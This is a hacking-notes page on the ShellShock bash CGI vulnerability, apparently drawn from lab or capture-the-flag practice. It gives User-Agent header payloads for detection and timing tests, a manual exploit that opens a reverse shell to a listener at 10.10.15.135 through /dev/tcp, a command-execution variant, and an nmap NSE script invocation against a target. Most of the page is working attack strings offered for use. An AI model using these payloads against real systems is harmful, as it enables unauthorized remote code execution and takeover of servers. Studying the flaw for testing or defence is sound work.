> For the complete documentation index, see [llms.txt](https://www.hackbook.io/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://www.hackbook.io/web-application-hacking/web-hacking-procedures/popular-exploits/shellshock.md).

# ShellShock

**ShellShocked:**\
if you have a cgi file(cgi is a directory where people put code to interfeace a website with some other service) with an old version of bash. Then possibly vulnerable. In the sample below we had a file called user.sh\
Checking if vuln:\
proxy with burp then change user agent to:\
test directly: () { :; };/bin/echo; echo \*hello\* //try without /bin/ also\
blind side test: () { :; }; sleep 10 //basically see if this makes the resonse 10 seconds slower than normaly\
\---may also have to try variations of this if server is confused---\
blind side test: () { :;}; echo; sleep 10\
blind side test: () { :;}; /bin/echo; sleep 10\
\
Manual exploit:\
open up a nc listener. then put the string below in the user agent.\
() { :; }; echo; bash -i >& /dev/tcp/10.10.15.135/8081 0>&1\
or try\
() { :; }; echo; /bin/bash -c ls\
\
Auto nse script:(tries several others like cookie, referal)\
\# locate nse | grep shellshock\
\#nmap -sV -p80 --script http-shelshock --script-args uri=/cgi-bin/user.sh, cmd=ls 10.10.10.56 //would be good to proxy this via burp and use cmd=ls 127.0.0.1 and -p8081 with a listener on local and forwarding to the site.\
Then look to find the shell shock request in history, send to repeater.\
\
sample of what it sends:

![](/files/oFKm0e10QkqhokxuCpz7)

sample modification to try if its not working:

![](/files/pD21eJq9hN7BlfDYOTWf)
